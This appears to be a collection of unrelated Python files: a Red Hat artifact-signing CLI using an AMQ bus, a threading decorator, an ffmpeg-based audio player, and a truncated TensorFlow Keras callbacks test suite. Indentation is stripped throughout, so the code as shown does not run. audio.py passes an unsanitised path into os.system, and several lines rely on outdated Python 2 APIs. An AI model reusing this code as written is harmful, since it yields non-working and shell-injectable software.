need this in multiple places so we want to ensure we do it the
same way each time.
"""
return AMQProducer(urls=URLS[env or 'stage'],
certificate=certificate,
private_key=private_key,
trusted_certificates=trusted_certificates,
topic=TOPIC)
def producer_thread(producer, args):
print(args)
producer.send_msg(*args)
def producer_send_msg(producer, *args):
t = threading.Thread(target=producer_thread, args=(producer, args))
t.start()
t.join()
def get_bus_consumer(env, certificate, private_key, trusted_certificates):
"""This is just a wrapper around creating a consumer. We're going to
do need this in multiple places though, so we want to ensure we do it
the same way each time.
"""
return AMQConsumer(urls=URLS[env or 'stage'], certificate=certificate,
private_key=private_key, trusted_certificates=trusted_certificates)
def art_consumer_callback(msg, notsure):
"""`msg` is a `Message` object which has various attributes. Such as `body`.
`notsure` I am not sure what that is. I only got as far as knowing
this callback requires two parameters.
"""
print(msg)
body = json.loads(msg.body)
print(json.dumps(body, indent=4))
if body['msg']['signing_status'] != 'success':
print("ERROR: robosignatory failed to sign artifact")
exit(1)
else:
# example: https://datagrepper.stage.engineering.redhat.com/id?id=2019-0304004b-d1e6-4e03-b28d-cfa1e5f59948&is_raw=true&size=extra-large
result = body['msg']['signed_artifact']
out_file = body['msg']['artifact_meta']['name']
with open(out_file, 'w') as fp:
fp.write(base64.decodestring(result))
fp.flush()
print("Wrote {} to disk".format(body['msg']['artifact_meta']['name']))
return True
def consumer_thread(consumer):
global env_value
if not env_value:
raise ValueError('env_value has not been set yet.')
consumer.consume(ART_CONSUMER.format(env=env_value), art_consumer_callback)
def consumer_start(consumer):
t = threading.Thread(target=consumer_thread, args=(consumer,))
t.start()
return t
def get_producer_consumer(env, certificate, private_key, trusted_certificates):
producer = get_bus_producer(env, certificate, private_key, trusted_certificates)
consumer = get_bus_consumer(env, certificate, private_key, trusted_certificates)
return (producer, consumer)
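# Overall flow used by both sub-commands below (sketch): build the
# producer/consumer pair, start a consumer thread listening on the
# ART_CONSUMER queue, publish the signing request on TOPIC through the
# producer, then join the consumer thread, which returns once
# art_consumer_callback has written the signed artifact to disk (or
# exits the process if robosignatory reports a failure).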
######################################################################
@cli.command("message-digest", short_help="Sign a sha256sum.txt file")
@requestor
@product
@request_id
@sig_keyname
@release_name_opt
@client_cert
@client_key
@client_type
@env_click_obj
@noop
@ca_certs
@arch_opt
@click.pass_context
def message_digest(ctx, requestor, product, request_id, sig_keyname,
release_name, client_cert, client_key, client_type, env, noop,
ca_certs, arch):
"""Sign a 'message digest'. These are sha256sum.txt files produced by
the 'sha256sum` command (hence the strange command name). In the ART
world, this is for signing message digests from extracting OpenShift
tools, as well as RHCOS bare-betal message digests.
"""
global env_value
env_value = env
if product == 'openshift':
artifact_url = MESSAGE_DIGESTS[product].format(
arch=arch,
release_name=release_name,
release_stage=client_type)
elif product == 'rhcos':
release_parts = release_name.split('.')
artifact_url = MESSAGE_DIGESTS[product].format(
arch=arch,
release_name_xy='.'.join(release_parts[:2]),
release_name=release_name)
artifact = get_digest_base64(artifact_url)
message = {
"artifact": artifact,
"artifact_meta": {
"product": product,
"release_name": release_name,
"name": "sha256sum.txt.gpg",
"type": "message-digest",
},
"request_id": request_id,
"requestor": requestor,
"sig_keyname": sig_keyname,
}
validated = presend_validation(message)
if validated is True:
print("Message contains all required fields")
to_send = json.dumps(message)
else:
print("Message missing required field: {}".format(validated))
exit(1)
if noop:
print("Message we would have sent over the bus:")
print(to_send)
else:
producer, consumer = get_producer_consumer(env, client_cert, client_key, ca_certs)
consumer_thread = consumer_start(consumer)
producer_send_msg(producer, {}, to_send)
print("Message we sent over the bus:")
print(to_send)
print("Submitted request for signing. The mirror-artifacts job should be triggered when a response is sent back")
print("Waiting for consumer to receive data back from request")
consumer_thread.join()
######################################################################
@cli.command("json-digest", short_help="Sign a JSON digest claim")
@requestor
@product
@request_id
@sig_keyname
@release_name_opt
@client_cert
@client_key
@client_type
@env_click_obj
@noop
@ca_certs
@digest
@arch_opt
@click.pass_context
def json_digest(ctx, requestor, product, request_id, sig_keyname,
release_name, client_cert, client_key, client_type, env, noop,
ca_certs, digest, arch):
"""Sign a 'json digest'. These are JSON blobs that associate a
pullspec with a sha256 digest. In the ART world, this is for "signing
payload images". After the json digest is signed we publish the
signature in a location which follows a specific directory pattern,
thus allowing the signature to be looked up programmatically.
"""
global env_value
env_value = env
json_claim = {
"critical": {
"image": {
"docker-manifest-digest": None
},
"type": "atomic container signature",
"identity": {
"docker-reference": None,
}
},
"optional": {
"creator": "Red Hat OpenShift Signing Authority 0.0.1",
},
}
release_stage = client_type
release_tag = release_name
pullspec = "registry.redhat.io/rh-acs/{}:{}".format(release_stage, release_tag)
json_claim['critical']['identity']['docker-reference'] = pullspec
if not digest:
digest = oc_image_info(pullspec)['digest']
json_claim['critical']['image']['docker-manifest-digest'] = digest
print("ARTIFACT to send for signing (WILL BE base64 encoded first):")
print(json.dumps(json_claim, indent=4))
message = {
"artifact": base64.b64encode(json.dumps(json_claim).encode()).decode(),
"artifact_meta": {
"product": product,
"release_name": release_name,
"name": json_claim['critical']['image']['docker-manifest-digest'].replace(':', '='),
"type": "json-digest",
},
"request_id": request_id,
"requestor": requestor,
"sig_keyname": sig_keyname,
}
validated = presend_validation(message)
if validated is True:
print("Message contains all required fields")
to_send = json.dumps(message)
else:
print("Message missing required field: {}".format(validated))
exit(1)
if noop:
print("Message we would have sent over the bus:")
print(to_send)
else:
producer, consumer = get_producer_consumer(env, client_cert, client_key, ca_certs)
consumer_thread = consumer_start(consumer)
producer_send_msg(producer, {}, to_send)
print("Message we sent over the bus:")
print(to_send)
print("Submitted request for signing. The mirror-artifacts job should be triggered when a response is sent back")
print("Waiting for consumer to receive data back from request")
consumer_thread.join()
######################################################################
if __name__ == '__main__':
cli()
|
decorators.py
|
''' Holds decorators for use in api '''
from threading import Thread
# Note: 'async' is a reserved keyword in Python 3.7+, so this module requires
# an older interpreter; the original decorator name is kept unchanged.
def async(f):
'''Run the decorated function on a background thread; the call returns immediately.'''
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return thr  # return the thread so callers can join() it if they need to
return wrapper
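# A minimal usage sketch (hypothetical function, not part of the api): the
# decorated call returns immediately while the work runs on a background thread.
if __name__ == '__main__':
    import time

    @async
    def slow_task(label):
        time.sleep(0.1)
        print('finished', label)

    slow_task('demo')   # returns right away; 'finished demo' prints ~0.1 s later
    time.sleep(0.2)     # give the background thread time to finish before exiting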
|
audio.py
|
import os
import wave
from multiprocessing import Process
import pyaudio
class Audio:
def __init__(self, video_path):
audio_path = os.path.splitext(video_path)[0] + ".wav"
if not os.path.exists(audio_path):
os.system("ffmpeg -i " + video_path + " -b:a 128k " + audio_path)
self.audio_thread = Process(target=self.playAudioThread, args=(audio_path,))
self.audio_thread.daemon = True
def playAudioThread(self, audio_path):
chunk = 1024
wf = wave.open(audio_path, 'rb')
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
while True:
audio_data = wf.readframes(chunk)
if audio_data == "": break;
stream.write(audio_data)
def start(self):
self.audio_thread.start()
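# A minimal usage sketch, assuming a local "example.mp4" exists and that
# ffmpeg and pyaudio are installed; playback runs in a daemon process, so the
# sleep keeps the parent alive long enough to hear the audio.
if __name__ == "__main__":
    import time
    audio = Audio("example.mp4")
    audio.start()
    time.sleep(5)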
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import sys
import threading
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the number of times each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
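# The wrapping above swaps each hook on the instance for a closure that bumps
# method_counts before delegating, e.g. Counter().on_epoch_end(0) increments
# method_counts['on_epoch_end'] and then calls the original (no-op)
# keras.callbacks.Callback hook.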
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
model = self._get_model()
counter = Counter()
model.evaluate(x, y, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
model = self._get_model()
counter = Counter()
model.predict(x, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def _run_load_weights_on_restart_test_common_iterations(self):
def get_input_datasets():
# Simple training input.
train_input = [[1]] * 16
train_label = [[0]] * 16
ds = dataset_ops.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
class Bias(base_layer.Layer):
def build(self, input_shape):
self.bias = self.add_variable('bias', (1,), initializer='zeros')
def call(self, inputs):
return inputs + self.bias
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
filepath = os.path.join(self.get_temp_dir(), 'checkpoint.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
model.fit(
train_ds,
epochs=3,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
])
# The filepath should exist after fitting with callback.
self.assertTrue(os.path.exists(filepath))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
self.assertTrue(os.path.exists(filepath))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are close, if a ModelCheckpoint with
# load_weights_on_restart=True is given (so the model is restored at the
# beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
model.load_weights(filepath)
weights_before_additional_fit = model.get_weights()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
])
model.load_weights(filepath)
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address is unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch, due to the high min_delta.
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
